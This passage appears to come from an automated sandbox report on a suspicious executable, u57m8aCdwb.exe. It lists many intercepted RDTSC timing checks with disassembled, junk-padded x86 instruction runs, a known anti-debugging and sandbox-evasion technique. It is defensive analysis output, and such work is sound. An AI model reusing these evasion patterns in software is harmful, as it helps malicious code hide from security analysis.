Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0D66 second address: 72C0D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0D6A second address: 72C0DB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F02989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+08h], eax 0x0000000e jmp 00007FF114F0297Eh 0x00000013 lea eax, dword ptr [ebx+70h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF114F02987h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0DB6 second address: 72C0DBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0DBC second address: 72C0DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0DC0 second address: 72C0DC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0DC4 second address: 72C0DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF114F0297Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0DDA second address: 72C0E08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov cl, 27h 0x0000000d jmp 00007FF1148823D1h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov edi, ecx 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0E08 second address: 72C0E25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 1CF26E66h 0x00000008 push edi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF114F0297Bh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0E25 second address: 72C0E29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0E29 second address: 72C0E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0E2F second address: 72C0E74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-18h] 0x0000000c jmp 00007FF1148823D0h 0x00000011 nop 0x00000012 pushad 0x00000013 mov edx, eax 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF1148823D2h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0E74 second address: 72C0E8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F0297Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0E8A second address: 72C0E90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0E90 second address: 72C0E96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0E96 second address: 72C0E9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0EC1 second address: 72C0F20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF114F0297Fh 0x00000009 adc cx, 0F1Eh 0x0000000e jmp 00007FF114F02989h 0x00000013 popfd 0x00000014 jmp 00007FF114F02980h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov edi, eax 0x0000001e jmp 00007FF114F02980h 0x00000023 test edi, edi 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0F20 second address: 72C0F3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0F3D second address: 72C0F74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F02981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FF1835710D3h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF114F02988h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0F74 second address: 72C0F7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0F7A second address: 72C0FBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F0297Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-14h] 0x0000000c jmp 00007FF114F02980h 0x00000011 mov ecx, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF114F02987h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0FBA second address: 72C0FC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0FC0 second address: 72C0FED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b jmp 00007FF114F02987h 0x00000010 mov edx, 759B06ECh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0FED second address: 72C0FF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0FF1 second address: 72C0FF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0FF7 second address: 72C1035 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b jmp 00007FF1148823D1h 0x00000010 lock cmpxchg dword ptr [edx], ecx 0x00000014 pushad 0x00000015 mov dh, cl 0x00000017 mov cx, bx 0x0000001a popad 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FF1148823CDh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C1035 second address: 72C1039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C1039 second address: 72C103F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C103F second address: 72C10D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F0297Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b jmp 00007FF114F02980h 0x00000010 jne 00007FF183570FF1h 0x00000016 jmp 00007FF114F02980h 0x0000001b mov edx, dword ptr [ebp+08h] 0x0000001e pushad 0x0000001f mov si, bx 0x00000022 popad 0x00000023 mov eax, dword ptr [esi] 0x00000025 jmp 00007FF114F0297Fh 0x0000002a mov dword ptr [edx], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov si, di 0x00000032 pushfd 0x00000033 jmp 00007FF114F02987h 0x00000038 xor ax, BC4Eh 0x0000003d jmp 00007FF114F02989h 0x00000042 popfd 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C10D0 second address: 72C1125 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF1148823D7h 0x00000009 xor al, 0000005Eh 0x0000000c jmp 00007FF1148823D9h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [esi+04h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF1148823D3h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C1125 second address: 72C112B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C112B second address: 72C112F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C112F second address: 72C115D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F0297Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+04h], eax 0x0000000e pushad 0x0000000f mov edx, eax 0x00000011 popad 0x00000012 mov eax, dword ptr [esi+08h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF114F0297Fh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C115D second address: 72C1161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C1161 second address: 72C1167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C1167 second address: 72C1194 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 mov bl, A6h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+08h], eax 0x0000000e jmp 00007FF1148823D6h 0x00000013 mov eax, dword ptr [esi+0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C1194 second address: 72C1198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C1198 second address: 72C119E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C119E second address: 72C11A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C11A4 second address: 72C11A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C11A8 second address: 72C11D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+0Ch], eax 0x0000000b jmp 00007FF114F0297Ah 0x00000010 mov eax, dword ptr [esi+10h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF114F02987h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C11D9 second address: 72C1203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, C2AAh 0x00000007 mov cx, bx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [edx+10h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF1148823D8h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C1203 second address: 72C1209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C1209 second address: 72C120D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C120D second address: 72C1232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F0297Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+14h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF114F0297Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C1232 second address: 72C1250 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+14h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C1250 second address: 72C1254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C1254 second address: 72C125A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C125A second address: 72C127C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F02982h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+18h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop esi 0x00000011 movsx edx, si 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C127C second address: 72C12EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF1148823D1h 0x00000008 mov ebx, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [edx+18h], eax 0x00000010 pushad 0x00000011 jmp 00007FF1148823D8h 0x00000016 push ecx 0x00000017 pushad 0x00000018 popad 0x00000019 pop edx 0x0000001a popad 0x0000001b mov eax, dword ptr [esi+1Ch] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FF1148823CFh 0x00000027 adc eax, 1117278Eh 0x0000002d jmp 00007FF1148823D9h 0x00000032 popfd 0x00000033 push eax 0x00000034 pop ebx 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C12EF second address: 72C1337 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 call 00007FF114F02984h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [edx+1Ch], eax 0x00000012 jmp 00007FF114F02981h 0x00000017 mov eax, dword ptr [esi+20h] 0x0000001a pushad 0x0000001b push eax 0x0000001c mov bx, AAFEh 0x00000020 pop edx 0x00000021 mov cl, C5h 0x00000023 popad 0x00000024 mov dword ptr [edx+20h], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C1337 second address: 72C134F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C134F second address: 72C1400 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 005BADA4h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esi+24h] 0x00000010 pushad 0x00000011 call 00007FF114F0297Fh 0x00000016 pushfd 0x00000017 jmp 00007FF114F02988h 0x0000001c xor al, FFFFFF88h 0x0000001f jmp 00007FF114F0297Bh 0x00000024 popfd 0x00000025 pop eax 0x00000026 movsx edi, ax 0x00000029 popad 0x0000002a mov dword ptr [edx+24h], eax 0x0000002d pushad 0x0000002e push eax 0x0000002f pushfd 0x00000030 jmp 00007FF114F0297Dh 0x00000035 or ecx, 286362A6h 0x0000003b jmp 00007FF114F02981h 0x00000040 popfd 0x00000041 pop ecx 0x00000042 mov dh, 1Eh 0x00000044 popad 0x00000045 mov eax, dword ptr [esi+28h] 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b pushfd 0x0000004c jmp 00007FF114F02985h 0x00000051 and si, A2B6h 0x00000056 jmp 00007FF114F02981h 0x0000005b popfd 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C1400 second address: 72C1405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C1405 second address: 72C1413 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF114F0297Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C1413 second address: 72C1417 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C1417 second address: 72C1446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+28h], eax 0x0000000b jmp 00007FF114F02987h 0x00000010 mov ecx, dword ptr [esi+2Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov si, dx 0x00000019 mov cx, di 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C1446 second address: 72C1459 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF1148823CFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C1459 second address: 72C145D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C145D second address: 72C149D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+2Ch], ecx 0x0000000b jmp 00007FF1148823D5h 0x00000010 mov ax, word ptr [esi+30h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF1148823D8h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C149D second address: 72C14A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C14A1 second address: 72C14A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C14A7 second address: 72C14AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C14AD second address: 72C14BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+30h], ax 0x0000000c pushad 0x0000000d mov ah, 30h 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C14BF second address: 72C1591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov ax, word ptr [esi+32h] 0x0000000a pushad 0x0000000b jmp 00007FF114F02985h 0x00000010 mov dh, al 0x00000012 popad 0x00000013 mov word ptr [edx+32h], ax 0x00000017 pushad 0x00000018 mov eax, edi 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d mov eax, edi 0x0000001f popad 0x00000020 popad 0x00000021 mov eax, dword ptr [esi+34h] 0x00000024 jmp 00007FF114F02983h 0x00000029 mov dword ptr [edx+34h], eax 0x0000002c jmp 00007FF114F02986h 0x00000031 test ecx, 00000700h 0x00000037 jmp 00007FF114F02980h 0x0000003c jne 00007FF183570B58h 0x00000042 pushad 0x00000043 pushfd 0x00000044 jmp 00007FF114F0297Eh 0x00000049 xor cl, FFFFFFD8h 0x0000004c jmp 00007FF114F0297Bh 0x00000051 popfd 0x00000052 jmp 00007FF114F02988h 0x00000057 popad 0x00000058 or dword ptr [edx+38h], FFFFFFFFh 0x0000005c jmp 00007FF114F02980h 0x00000061 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C1591 second address: 72C1595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C1595 second address: 72C15B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F02989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C15B2 second address: 72C15D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 jmp 00007FF1148823D3h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d or dword ptr [edx+40h], FFFFFFFFh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov esi, edx 0x00000016 mov bl, 0Ah 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C15D9 second address: 72C15DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C15DF second address: 72C15E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C15E3 second address: 72C1606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push esi 0x0000000d pop edi 0x0000000e jmp 00007FF114F02984h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C1606 second address: 72C1663 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FF1148823D4h 0x00000011 jmp 00007FF1148823D5h 0x00000016 popfd 0x00000017 mov ax, 20C7h 0x0000001b popad 0x0000001c leave 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF1148823D9h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C1663 second address: 72C1669 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C1669 second address: 72C166D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C166D second address: 72C1671 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 7300B74 second address: 7300B9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 4A34AF83h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FF1148823D6h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 7300B9E second address: 7300BA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
